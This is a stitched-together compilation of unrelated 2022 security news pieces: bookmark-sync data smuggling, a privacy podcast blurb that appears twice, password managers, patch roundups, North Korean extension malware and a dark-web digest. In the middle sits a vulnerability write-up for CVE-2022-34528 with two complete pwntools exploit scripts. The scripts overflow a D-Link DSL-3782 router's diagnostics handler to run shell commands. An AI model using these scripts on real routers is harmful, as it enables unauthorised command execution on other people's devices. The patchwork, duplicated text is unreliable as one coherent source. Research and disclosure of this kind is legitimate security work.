"Bruggling" emerges as a novel technique for pilfering data out from a compromised environment — or for sneaking in malicious code and attack tools.

Bookmark synchronization has become a standard feature in modern browsers: It gives Internet users a way to ensure that the changes they make to bookmarks on a single device take effect simultaneously across all their devices. However, it turns out that this same helpful browser functionality also gives cybercriminals a handy attack path.

To wit: Bookmarks can be abused to siphon out reams of stolen data from an enterprise environment, or to sneak in attack tools and malicious payloads, with little risk of being detected.

David Prefer, an academic researcher at the SANS Technology Institute, made the discovery as part of broader research into how attackers can abuse browser functionality to smuggle data out from a compromised environment and carry out other malicious functionality.

In a recent technical paper, Prefer described the process as "bruggling" — a portmanteau of browser and smuggling. It's a novel data exfiltration vector that he demonstrated with a proof-of-concept (PoC) PowerShell script called "Brugglemark" that he developed for the purpose.

**The Fine Art of Bruggling**

"There's no weakness or vulnerability that is being exploited with the synchronization process," Prefer stresses. "What this paper hones in on is the ability to name bookmarks whatever you want, and then synchronize them to other signed-in devices, and how that very convenient, helpful functionality can be twisted and misused in an unintended way."

An adversary would already need access — either remote or physical — to the environment and would have already infiltrated it and collected the data they want to exfiltrate. They could then either use stolen browser synchronization credentials from a legitimate user in the environment or create their own browser profile, then access those bookmarks on another system where they've been synchronized to access and save the data, Prefer says. An attacker could use the same technique to sneak malicious payloads and attack tools into an environment.

The benefit of the technique is, put simply, stealth.

Johannes Ullrich, dean of research at the SANS Institute, says data exfiltration via bookmark syncing gives attackers a way to bypass most host and network-based detection tools. To most detection tools, the traffic would appear as normal browser synch traffic to Google or any other browser maker. "Unless the tools look at the volume of the traffic, they will not see it," Ullrich says. "All traffic is also encrypted, so it is a bit like DNS over HTTPs or other 'living off the cloud' techniques," he says.

**Bruggling in Practice**

In terms of how an attack might be carried out in the real world, Prefer points to an example where an attacker might have compromised an enterprise environment and accessed sensitive documents. To exfiltrate the data via bookmark synching, the attacker would first need to put the data into a form that can be stored as bookmarks. To do this, the adversary could simply encode the data into base64 format and then split the text into separate chunks and save each of those chunks as individual bookmarks.

Prefer discovered — through trial and error — that modern browsers allow a considerable number of characters to be stored as single bookmarks. The actual number varied with each browser. With the Brave browser, for example, Prefer discovered he could synchronize, very quickly, the entirety of the book _Brave New World_ using just two bookmarks. Doing the same with Chrome required 59 bookmarks. Prefer also discovered during testing that browser profiles could synchronize as many as 200,000 bookmarks at a time.

Once the text has been saved as bookmarks and synchronized, all that the attacker would need to do is sign into the browser from another device to access the content, reassemble it, and decode it from base64 back into the original text.

"As for what kind of data could be exfiltrated via this technique, I think that's up to the creativity of an adversary," Prefer says.

Prefer's research was primarily focused on browser market share leader Google Chrome — and to a lesser extent on other browsers such as Edge, Brave, and Opera, which are all based on the same open source Chromium project that Chrome is built upon. But there's no reason why bruggling won't work with other browsers such as Firefox and Safari, he notes.

**Other Use Cases**

Significantly, bookmark syncing is not the only browser function that can be abused this way, Prefer says. "There are plenty of other browser features that are used in synchronization that could be misused in a similar way, but would require research to investigate," he says. As examples, he points to autofills, extensions, browser history, stored passwords, preferences, and themes, which can all be synchronized. "With a bit of research, it might turn out that they can also be abused," Prefer says.

Ullrich says Prefer's paper was inspired by earlier research that showed how browser extension syncing could be used for data exfiltration and command and control. With that method, however, a victim would have been required to install a malicious browser extension, he says.

**Mitigating the Threat**

Prefer says organizations can mitigate the risk of data exfiltration by disabling bookmark syncing using Group Policy. Another option would be to limit the number of email domains that are allowed to sign in for syncing, so attackers would not be able to use their own account to do it.

"\[Data loss protection\] DLP monitoring that an organization already performs can be applied here as well," he says.

Bookmark syncing would not work very well if the syncing happened at a slower speed, Ullrich says. "But being able to sync 200,000+ bookmarks, and only seeing some speed throttling after 20,000 or 30,000 bookmarks makes this \[very\] valuable," he says.

Thus, browser makers can make things harder for attackers for instance by dynamically throttling bookmark syncing based on factors like the age of an account or logins from a new geographic location. Similarly, bookmarks that contain base64 encoding could be prevented from syncing, as well as bookmarks with excessive names and URLs, Prefer says.

Chromium Browsers Allow Data Exfiltration via Bookmark Syncing

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 
The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we’re bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court’s decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google’s all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn’t just because so much of our data is tracked today, but that we currently don’t know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today’s fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

March 7, 2022 - The most important and interesting security stories from the last seven days.

February 28, 2022 - This week on Lock and Code, we discuss Crisis Text Line's data-sharing agreement with its for-profit partner, which has upset many people.

Have we lost the fight for data privacy? Lock and Code S03E16

Categories: Podcast
Tags: Data privacy

Tags: facebook

Tags: Google

Tags: lock and code

Tags: lock and code podcast

Tags: malwarebytes labs

Tags: podcast

This week on Lock and Code, we talk with some of the team behind Malwarebytes Labs about whether we've lost the fight for data privacy. 



(Read more...)




The post Have we lost the fight for data privacy? Lock and Code S03E16 appeared first on Malwarebytes Labs.

Posted: August 1, 2022 by

At the end of 2021, Lock and Code invited the folks behind our news-driven cybersecurity and online privacy blog, Malwarebytes Labs, to discuss what upset them most about cybersecurity in the year prior. Today, we're bringing those same guests back to discuss the other, biggest topic in this space and on this show: Data privacy.

You see, in 2021, a lot has happened.

Most recently, with the US Supreme Court's decision to remove the national right to choose to have an abortion, individual states have now gained control to ban abortion, which has caused countless individuals to worry about whether their data could be handed over to law enforcement for investigations into alleged criminal activity. Just months prior, we also learned about a mental health nonprofit that had taken the chat messages of at-times suicidal teenagers and then fed those messages to a separate customer support tool that was being sold to corporate customers to raise money for the nonprofit itself. And we learned about how difficult it can be to separate yourself from Google's all-encompassing, data-tracking empire.

None of this is to mention more recent, separate developments: Facebook finding a way to re-introduce URL tracking, facial recognition cameras being installed in grocery stores, and Google delaying its scheduled plan to remove cookie tracking from Chrome.

Today, on Lock and Code with host David Ruiz, we speak with Malwarebytes Labs editor-in-chief Anna Brading and Malwarebytes Labs writer Mark Stockley to answer one, big question: Have we lost the fight to meaningfully preserve data privacy?

The outlook, according to our guests, is bleak, and that isn't just because so much of our data is tracked today, but that we currently don't know whether the data that is tracked today could, sometime in the future, become data that is valuable in entirely new ways—much like how period-tracking data suddenly became far more sensitive following the overturning of Roe v. Wade in the United States.

> That’s a big, big danger with this. That you can’t, you just can’t predict where your data is going to end up in the future, or how it mights be used against you. And the more data that is collected on you, and the more it’s aggregated, the more compounded that danger becomes.
> 
> Mark Stockley, Malwarebytes Labs writer

Tune in to the latest episode of Lock and Code to hear about today's fight to preserve data privacy, what the future of data privacy could look like, and what our guests are doing today to preserve the data privacy of those around them, even if the forecast looks dim.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

Keep your logins locked down with our favorite apps for PC, Mac, Android, iPhone, and web browsers.

Bitwarden offers a paid upgrade account. The cheapest of the bunch, Bitwarden Premium, is $10 per year. That gets you 1 GB of encrypted file storage, two-factor authentication with devices like YubiKey, FIDO U2F, Duo, and a password hygiene and vault health report. Paying also gets you priority customer support.

_After signing up,_ _download the app_ _for Windows, MacOS, Android, iOS, or Linux. There are also browser extensions for_ _Firefox, Chrome, Safari, Edge, Vivaldi, and Brave__._

Best Full-Featured Manager

Courtesy of Dashlane

I first encountered Dashlane several years ago. Back then, it was the same as its competitors with no standout attributes. But recent updates have added several helpful features. One of the best is Site Breach Alerts, something other services have since added as well. Dashlane actively monitors the darker corners of the web, looking for leaked or stolen personal data, and then alerts you if your information has been compromised.

Setup and migration from another password manager is simple, and you’ll use a secret key to encrypt your passwords, much like 1Password’s setup process. In practice, Dashlane is very similar to the others in this list. The company did discontinue its desktop app earlier this year, moving to a web-based user interface, which is a little different than 1Password and Bitwarden. (The desktop apps officially shut down on January 10, 2022.) I primarily use passwords in the web browser anyway, and Dashlane has add-ons for all the major browsers, along with iOS and Android apps. If a desktop app is important to you, it’s something to be aware of. Dashlane offers a 30-day free trial, so you can test it out before committing.

_After signing up,_ _download the app_ _for Android and iOS, and grab the browser extensions for_ _Firefox, Chrome, and Edge__._

Best DIY Option (Self-Hosted)

Courtesy of KeePassXC

Want to retain more control over your data in the cloud? Try using a desktop application like KeePassXC. It stores encrypted versions of all your passwords into an encrypted digital vault that keeps you secure with a master password, a key file, or both. The difference is that instead of a hosted service like 1Password syncing it for you, you sync that database file yourself using a file-syncing service like Dropbox or Edward Snowden’s recommended service, SpiderOak. Once your file is in the cloud, you can access it on any device that has a KeePassXC client.

Why do it yourself? In a word: transparency. Like Bitwarden, KeepassXC is open source, which means its code can be and has been inspected for critical flaws.

_Download the_ _desktop app_ _for Windows, MacOS, or Linux and create your vault. There are also extensions for_ _Firefox__,_ _Edge__, and_ _Chrome__. It does not have official apps for your phone. Instead, the project recommends_ _KeePass2Android_ _or_ _Strongbox for iPhone__._

Another Option

Courtesy of NordPass

NordPass is a relatively new kid on the password manager block, but it comes from a company with significant pedigree. NordVPN is a well-known VPN provider, and the company brings to its password manager much of the ease of use and simplicity that made its VPN offering popular. The installation and setup process is a breeze. There are apps for every major platform (including Linux), browser, and device.

The free version of NordPass is limited to one device, and there’s no syncing available. There is a seven-day free trial of the premium version, which lets you test device syncing. But to get that for good, you’ll have to upgrade to the $36-a-year plan. (Like its VPN service, NordPass accepts payment in cryptocurrencies.)

You Need a Password Manager. Here Are the Best Ones

Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.

July has been a month of important updates, including patches for already-exploited vulnerabilities in Microsoft and Google products. This month also saw the first Apple iOS update in eight weeks, fixing dozens of security flaws in iPhones and iPads.

Security vulnerabilities continue to hit enterprise products, too, with July patches issued for SAP, Cisco, and Oracle software. Here’s what you need to know about the vulnerabilities fixed in July.

Apple iOS 15.6

Apple has released iOS and iPadOS 15.6 to fix 37 security flaws, including an issue in Apple File System (APFS) tracked as CVE-2022-32832. If exploited, the vulnerability could allow an app to execute code with kernel privileges, according to Apple’s support page, giving it deep access to your device.

Other iOS 15.6 patches fix vulnerabilities in the kernel and WebKit browser engine, as well as flaws in IOMobileFrameBuffer, Audio, iCloud Photo Library, ImageIO, Apple Neural Engine, and GPU Drivers.

Apple isn’t aware of any of the patched flaws being used in attacks, but some of the vulnerabilities are pretty serious—especially those affecting the kernel at the heart of the operating system. It’s also possible for vulnerabilities to be chained together in attacks, so make sure you update as soon as possible.

The iOS 15.6 patches were released alongside watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, macOS Big Sur 11.6.8, and macOS Catalina 10.15.7 2022-005.

Google Chrome

Google released an emergency patch for its Chrome browser in July, fixing four issues, including a zero-day flaw that has already been exploited. Tracked as CVE-2022-2294 and reported by Avast Threat Intelligence researchers, the memory corruption vulnerability in WebRTC was abused to achieve shellcode execution in Chrome’s renderer process.

The flaw was used in targeted attacks against Avast users in the Middle East, including journalists in Lebanon, to deliver spyware called DevilsTongue.

Based on the malware and tactics used to carry out the attack, Avast attributes the use of the Chrome zero-day to Candiru, an Israel-based company that sells spyware to governments.

Microsoft’s Patch Tuesday

Microsoft’s July Patch Tuesday is a big one, fixing 84 security issues including a flaw already being used in real-world attacks. The vulnerability, CVE-2022-22047, is a local privilege escalation flaw in the Windows Client/Server Runtime Subsystem (CSRSS) server and client Windows platforms, including the latest Windows 11 and Windows Server 2022 releases. An attacker able to successfully exploit the vulnerability could gain System privileges, according to Microsoft.

Of the 84 issues patched in Microsoft’s July Patch Tuesday, 52 were privilege escalation flaws, four were security feature bypass vulnerabilities, and 12 were remote code execution issues.

Microsoft security patches do sometimes cause other issues, and the July update was no different: Following the release, some users found MS Access runtime applications did not open. Thankfully, the firm is rolling out a fix.

Android July Security Bulletin

Google has released July updates for its Android operating system, including a fix for a critical security vulnerability in the System component that could lead to remote code execution with no additional privileges needed.

Google also fixed serious issues in the kernel–which could result in information disclosure—and the framework, which could lead to local privilege escalation. Meanwhile, vendor-specific patches from MediaTek, Qualcomm, and Unisoc are available if your device is using those chips. Samsung devices are starting to receive the July patch, and Google also released updates for its Pixel range.

SAP

Software maker SAP has issued 27 new and updated security notes as part of its July Security Patch Day, fixing multiple high-severity vulnerabilities. Tracked as CVE-2022-35228, the most serious issue is an information disclosure flaw in the central management console of the vendor’s Business Objects platform.

The vulnerability allows an unauthenticated attacker to gain token information over the network, according to security firm Onapsis. “Fortunately, an attack like this would require a legitimate user to access the application,” the firm adds. However, it’s still important to patch as soon as possible.

Oracle

Oracle has issued 349 patches in its July 2022 Critical Patch Update, including fixes for 230 flaws that can be exploited remotely.

Oracle’s April Patch Update included 520 security fixes, some of which addressed CVE-2022-22965, aka Spring4Shell, a remote code execution flaw in the spring framework. Oracle’s July update continues to address this issue.

Apple Just Patched 37 iPhone Security Bugs

Plus: Google delays the end of cookies (again), EU officials were targeted with Pegasus spyware, and more of the top security news.

Russia’s full-scale invasion of Ukraine has been ongoing for more than 150 days, with no end to the conflict in sight. While Ukrainian troops are having some success with counteroffensives in the south of the country, the war is having long-lasting impacts on freedom of speech and online censorship.

This week, we documented how a flurry of more than half a dozen new Russian laws, all proposed or passed in recent months, will help to separate Russia from the global internet. The move, if successful, could damage the very idea of the free and open internet and have global ramifications. But it is not all bad news. Russia’s attempts to block and censor people’s online lives are hitting some stumbling blocks: Its long-held ambition to block anonymity service Tor is faltering.

Last month, Joe Biden signed the Bipartisan Safer Communities Act, the first major federal gun law passed in years. However, senators lacked any real government data on gun violence when they were drafting the law, in part because, until 2019, the Centers for Disease Control and Prevention was banned for decades from studying gun violence in America. As a result, much of the data used to inform the Act came from elsewhere. We also looked at whether states could legally block people seeking abortions from crossing state lines to do so following the fall of _Roe v. Wade_.

Elsewhere, we’ve also put together a guide to how you can safely lend your phone to someone else, whether to a friend who wants to look at your holiday photos or a stranger who needs to make an emergency phone call. A few simple tweaks to your iPhone or Android settings can quickly help to secure your data.

And there’s more. Each week we round up the news that we didn’t break or cover in depth. Click on the headlines to read the full stories. And stay safe out there!

Every year, the list of companies getting hacked or suffering data breaches continues to grow. These incidents are often the result of businesses’ technical misconfigurations or poor security practices. While each incident is different, it is undeniable that data breaches can have huge impacts on those impacted: individuals who have their data leaked, for example, and companies who have to deal with reputation and financial damage. This week, an IBM report revealed that the cost of a data breach in 2022 has reached an “all-time high,” averaging $4.35 million. That’s a 2.6 percent increase from last year.

Perhaps more salient, according to IBM’s data, is that companies are hitting their customers with the costs of data breaches. The company surveyed 550 organizations that had suffered a data breach between March 2021 and March 2022, and 60 percent of them said they had increased their prices as a result of the breach. No specific examples were given in the report. And it’s unclear whether companies passing on the costs of cybersecurity incidents are investing that extra income into better protecting their customer’s data in the future. However, according to IBM, only 17 percent of the 550 companies surveyed said it was the first data breach they had suffered.

Another week, another set of spyware bombshells. This week Reuters revealed that the European Union found evidence that phones belonging to its staff were targeted with Pegasus, the powerful hacking tool of Israeli firm NSO Group. EU Justice Commissioner Didier Reynders was apparently told by Apple that his iPhone may have been hacked in 2021. An ongoing EU investigation, according to Reuters, found indicators of compromise on some devices. It follows officials announcing that 14 EU member states have purchased Pegasus in the past.

That was not the only spyware revelation this week. The leader of Greece’s opposition political party launched a complaint alleging his phone had been targeted with Israeli-made Predator spyware, developed by Cytrox. Microsoft also linked spyware, dubbed Subzero, to European firm DSIRF. The details, published to coincide with a spyware hearing of the House Intelligence Committee, claimed Subzero had been used to target banks and consultancy firms in Austria, the UK, and Panama.

If technology companies want to operate in China and sell their products to a market of more than a billion people, they’re going to have to bend to the rules. Firms are required to store data locally and, as Apple learned, may have to compromise the security protections they put in place around people’s data. As the video game _Roblox_ prepared to launch in China in 2017 and 2018, its developer was well aware of the potential consequences.

According to _Roblox_ documents obtained by VICE, the company believed it could be hacked if it entered China and that rivals would create their own version of its game. “Expect that hacking has already started,” an internal presentation in 2017 said. The documents also show how _Roblox_ applied Chinese censorship laws—“illegal content” included tampering with historical facts and misrepresenting Chinese territories on maps—and other local laws, such as collecting players’ real names. _Roblox_ eventually launched its Chinese app LuoBuLesi in July 2021, but shut it down at the start of this year.

For years, Apple’s Safari and Mozilla’s Firefox browsers have limited how third-party cookies can track you across the web. These small snippets of code, which are saved to your device when you visit websites, are able to track your browsing history and show you ads based on what you’ve seen. They’re widely considered a privacy nightmare. So when Google announced, in January 2020, that Chrome would finally ditch creepy third-party cookies by 2022, the move was a big deal. However, in practice, Google has struggled to make the change. This week, Google announced its plan has been delayed for a second time. Third-party cookies have been given a stay of execution until at least the backend of 2024, when they will start to be phased out. So far, Google’s efforts to replace third-party cookies have been turbulent, with privacy advocates claiming the replacements are worse than cookies, and the advertising industry saying they’ll decrease competition.

You Pay More When Companies Get Hacked

A threat actor operating with interests aligned with North Korea has been deploying a malicious extension on Chromium-based web browsers that's capable of stealing email content from Gmail and AOL.
Cybersecurity firm Volexity attributed the malware to an activity cluster it calls SharpTongue, which is said to share overlaps with an adversarial collective publicly referred to under the name

A threat actor operating with interests aligned with North Korea has been deploying a malicious extension on Chromium-based web browsers that's capable of stealing email content from Gmail and AOL.

Cybersecurity firm Volexity attributed the malware to an activity cluster it calls **SharpTongue**, which is said to share overlaps with an adversarial collective publicly referred to under the name Kimsuky.

SharpTongue has a history of singling out individuals working for organizations in the U.S., Europe, and South Korea who "work on topics involving North Korea, nuclear issues, weapons systems, and other matters of strategic interest to North Korea," researchers Paul Rascagneres and Thomas Lancaster said.

Kimsuky's use of rogue extensions in attacks is not new. In 2018, the actor was seening a Chrome plugin as part of a campaign called Stolen Pencil to infect victims and steal browser cookies and passwords.

But the latest espionage effort is different in that it employs the extension, named Sharpext, to plunder email data. "The malware directly inspects and exfiltrates data from a victim's webmail account as they browse it," the researchers noted.

Targeted browsers include Google Chrome, Microsoft Edge, and Naver's Whale browsers, with the mail-theft malware designed to harvest information from Gmail and AOL sessions.

Installation of the add-on is accomplished by means of replacing the browser's Preferences and Secure Preferences files with those received from a remote server following a successful breach of a target Windows system.

This step is succeeded by enabling the DevTools panel within the active tab to steal email and attachments from a user's mailbox, while simultaneously taking steps to hide any warning messages about running developer mode extensions.

"This is the first time Volexity has observed malicious browser extensions used as part of the post-exploitation phase of a compromise," the researchers said. "By stealing email data in the context of a user's already-logged-in session, the attack is hidden from the email provider, making detection very challenging."

The findings arrive several months after the Kimsuky actor was connected to intrusions against political institutions located in Russia and South Korea to deliver an updated version of a remote access trojan known as Konni.

Last week, cybersecurity firm Securonix took the wraps off an ongoing attack campaign exploiting high-value targets, including the Czech Republic, Poland, and other countries, as part of a campaign codenamed STIFF#BIZON to distribute the Konni malware.

While the tactics and tools used in the intrusions point to a North Korean hacking group called APT37, evidence gathered pertaining to the attack infrastructure suggests the involvement of the Russia-aligned APT28 (aka Fancy Bear or Sofacy) actor.

"In the end, what makes this particular case interesting is the usage of Konni malware in conjunction with tradecraft similarities to APT28," the researchers said, adding it could be a case of one group masquerading as another in order to confuse attribution and escape detection.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Using Malicious Browser Extension to Spy on Email Accounts

D-Link DSL-3782 v1.03 and below was discovered to contain a stack overflow via the function getAttrValue.

Vendor of the products:　D-Link

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　DSL-3782 v1.01, DSL-3782 v1.03

**Buffer overflow****Code in cfg\_manager**

Code bellow (in cfg\_manager) performs the traceroute (or ping) test in the Diagnostic webpage.

The _getAttrValue_ method at .text: 0x474bA4 can lead to a stack-based buffer overflow.

**Code in getAttrValue**

The dst parameter (a4) of strcpy corresponds to the $a3 register in the above picture, which comes from the $s1 register, and the $s1 register stores an offset address in stack (at .text: 474af0).

**In v1.01****exp**

import requests
import urllib
from pwn import \*

context.binary \= "../\_DSL-3782\_A1\_EU\_1.01\_07282016.bin.extracted/squashfs-root/userfs/bin/cfg\_manager"
context.endian \= "big"
context.arch \= "mips"

main\_url \= "http://192.168.1.1:80"

def login():
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        }
    url \= main\_url + "/cgi-bin/Login.asp?User=admin&Pwd=admin&\_=1640832458081"
    resp \= s.get(url,headers\=headers,timeout\=10)
    print resp.text

def get\_session\_key():
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        }
    url \= main\_url + "/cgi-bin/get/New\_GUI/get\_sessionKey.asp"
    resp \= s.get(url,headers\=headers,timeout\=10)
    sessionKey \= resp.text
    return sessionKey

def exp(sessionKey\=None):
    libc\_base \= 0x2b50b000
    system\_offset \= 0x59bb0
    system\_addr \= libc\_base + system\_offset
    gadget\_offset \= 0x0001656C
    gadget\_addr \= libc\_base + gadget\_offset

    cmd \= "echo yab. > /tmp/1"
    padding \= "a" \* 72
    s0 \= p32(system\_addr)
    s1 \= "AAAA"
    s2 \= "BBBB" 
    s3 \= "CCCC"
    ra \= p32(gadget\_addr)
    padding2 \= "A" \* 16
    payload \= padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd

    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
        }
    params \= {
        "Type":"p", "sessionKey":urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
        }
    url \= main\_url + "/cgi-bin/New\_GUI/Set/Diagnostics.asp"
    resp \= s.post(url,data\=params,headers\=headers,timeout\=10)
    print resp.text

if \_\_name\_\_ \== '\_\_main\_\_':
    login()
    sessionKey \= get\_session\_key()
    exp(sessionKey\=sessionKey) 

**Attack effect**

Since the command we executed in the exploit script (line 41) is echo yab. > /tmp/1, we can confirm that our attack was successful by printing the content in file /tmp/1.

**In v1.03**

An authenticated attacker can still use the stack-based bof to complete remote code execution of single-word commands (such as reboot).

**exp**

import requests
import urllib
from pwn import \*
import os
from time import sleep

context.binary \= "../new/\_DSL-3782\_A1\_EU\_1.03\_04042018.bin.extracted/squashfs-root/userfs/bin/cfg\_manager"
context.endian \= "big"
context.arch \= "mips"

server \= "192.168.1.1"
main\_url \= "http://192.168.1.1:80"

def get\_session\_key(a):
    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        "Cookie": "SESSIONID\_AUTH=%s" % a
        }
    url \= main\_url + "/cgi-bin/get/New\_GUI/get\_sessionKey.asp"
    resp \= s.get(url,headers\=headers,timeout\=10)
    sessionKey \= resp.text
    print(sessionKey)
    return sessionKey

def exp(sessionKey\=None,a\=''):
    libc\_base \= input('libc\_base:')
    system\_offset \= 0x59bb0
    system\_addr \= libc\_base + system\_offset
    gadget\_offset \= 0x0001656C
    gadget\_addr \= libc\_base + gadget\_offset

    cmd \= "reboot"
    padding \= "a" \* 72
    s0 \= p32(system\_addr)
    s1 \= "AAAA"
    s2 \= "BBBB" 
    s3 \= "CCCC"
    ra \= p32(gadget\_addr)
    padding2 \= "A" \* 16
    payload \= padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd

    s \= requests.Session()
    s.verify \= False
    headers \= {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        "Cookie": "SESSIONID\_AUTH=%s" % a
        }
    params \= {
        "Type":"t", "sessionKey":urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
        }
    url \= main\_url + "/cgi-bin/New\_GUI/Set/Diagnostics.asp"
    resp \= s.post(url,data\=params,headers\=headers,timeout\=10)
    print resp.text

if \_\_name\_\_ \== '\_\_main\_\_':
    print '\\n\[\*\] Connection %r' % main\_url
    a \= input()
    print '\[\*\] Getting session key'
    sessionKey \= get\_session\_key(a)
    print '\[\*\] Sending payload'
    exp(sessionKey\=sessionKey, a\=a) 
    sleep(1)
    print '\[\*\] Rebooting the target!'
    sleep(2)
    print '\[\*\] Done!'

**Attack effect**

Since the command we executed in the exploit script (line 37) is reboot , you can see that the emulator (firmadyne) is rebooting.

CVE-2022-34528: Vuls/BOF_in_D-Link DSL-3782.md at main · 1160300418/Vuls

Dark Reading's digest of other "don't-miss" stories of the week — including a Microsoft alert connecting disparate cybercrime activity together, and an explosion of Luca Stealer variants after an unusual Dark Web move.

Being a cybersecurity-focused news team is a busy business, and we can't always bring you all the news that's fit to print in a given week. That's why we've developed our weekly digest that rounds up all of the things that we couldn't get to, in case you missed it (ICYMI).

This week, we go deep into the world of the cybercrime underground, and how these markets and the complex relationships typically function.

ICYMI, read on for the following stories from the Dark Web:

*   **Raspberry Robin USB Worm Linked to Evil Corp.**
*   **Initial Access Brokers Are Now Actively Targeting MSPs**
*   ****Dozens of Luca Stealer Variants Rise Up After Author Goes Open Source****

**Raspberry Robin USB Worm Linked to Evil Corp.**

Raspberry Robin, a backdooring worm that infects PCs via Trojanized USB devices before spreading to other devices on a target's network, has been marshalled into service to enable a campaign that appears to track with Evil Corp. tactics.

According to an updated alert from Microsoft on Thursday, existing, dormant Raspberry Robin infections are being used by a known initial access broker (tracked by the tech giant as DEV-0206) to deploy the FakeUpdates malware, which in turn fetches additional code.

At this point, Evil Corp. takes over, according to the analysis. In this stage, FakeUpdates delivers Cobalt Strike and other hallmarks of "pre-ransomware," before deploying a custom in-house ransomware payload such as WastedLocker, PhoenixLocker, or Macaw.

"Around November 2021, \[Evil Corp.\] started to deploy the LockBit 2.0 … payload in their intrusions," according to the post. "The use of a RaaS payload by the Evil Corp. activity group is likely an attempt … to avoid attribution to their group, which could discourage payment due to their sanctioned status."

DEV-0206 and Evil Corp. have worked together for a while, Microsoft notes, but the initial access was before achieved via malvertising. The connection to Red Raspberry is new and notable, according to the researchers.

"We continue to see Raspberry Robin activity, but we have not been able to associate it with any specific person, company, entity, or country," says Katie Nickels, director of intelligence at Red Canary, which first discovered the threat in 2021. "Ultimately, it’s too early to say if Evil Corp is responsible for, or associated with, Raspberry Robin."

**Initial Access Brokers Are Now Actively Targeting MSPs**

Initial access brokers (IABs) are a key piece of the underground economy; they break into networks, establish backdoors, then rent that access to fellow nefarious types. Researchers at Huntress this week revealed a new twist: IABs actively hawking access to a managed service provider (MSP) as a way to get to their downstream customers.

Huntress CEO Kyle Hanslovan came across an ad on an underground forum offering just such access, boasting that the rental would include an "in" to the networks of at least 50 of the MSP's customers.

MSPs were, infamously, the target for the Kaseya fiasco, which resulted in more than 5,000 organizations suffering REvil ransomware attacks.

MSPs remain an attractive supply chain target for attackers of all types, as flagged by US federal agencies in May. A warning for MSPs and their customers noted that MSPs in multiple countries (including Australia, Canada, New Zealand and the UK) were likely being actively targeted.

**Dozens of Luca Stealer Variants Rise Up After Author Goes Open Source**

The infostealing baddie known as Luca Stealer is about to become more prevalent on the cybercrime scene, researchers are warning, thanks to the source code being revealed online.

Researchers at Cyble said this week that the developer of the Rust-coded malware decided to openly post the source code on cybercrime forums and on GitHub on July 3, in hopes of burnishing a fledgling reputation as a malware coder. It's an odd move in a world where custom malware can be rented out at a premium.

